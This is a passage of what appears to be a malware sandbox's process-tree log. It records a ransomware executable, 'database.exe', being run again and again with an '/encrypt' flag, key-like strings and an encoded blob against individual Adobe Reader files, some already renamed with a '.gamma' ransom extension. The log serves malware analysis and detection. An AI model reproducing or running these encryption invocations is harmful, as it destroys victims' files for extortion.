                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe"
                                                                                                                                              5⤵
                                                                                                                                                PID:5452
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe"
                                                                                                                                                5⤵
                                                                                                                                                  PID:1740
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeLinguistic.dll"
                                                                                                                                                  5⤵
                                                                                                                                                    PID:5944
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                    5⤵
                                                                                                                                                      PID:2604
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ahclient.dll"
                                                                                                                                                      5⤵
                                                                                                                                                        PID:3700
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\authplay.dll"
                                                                                                                                                        5⤵
                                                                                                                                                          PID:4768
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AXE8SharedExpat.dll"
                                                                                                                                                          5⤵
                                                                                                                                                            PID:956
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AXSLE.dll"
                                                                                                                                                            5⤵
                                                                                                                                                              PID:3920
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\BIBUtils.dll"
                                                                                                                                                              5⤵
                                                                                                                                                                PID:3788
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ccme_base.dll"
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:4268
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\CoolType.dll"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:4088
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.dll"
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:6036
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:4016
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\icudt36.dll"
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:3812
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\JP2KLib.dll"
                                                                                                                                                                          5⤵
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          PID:3420
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\logsession.dll"
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:5868
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:4364
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Onix32.dll"
                                                                                                                                                                              5⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:4764
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\reader_sl.exe"
                                                                                                                                                                              5⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:5800
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\rt3d.dll"
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:4456
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:3908
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\sqlite.dll"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:2780
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\database.exe
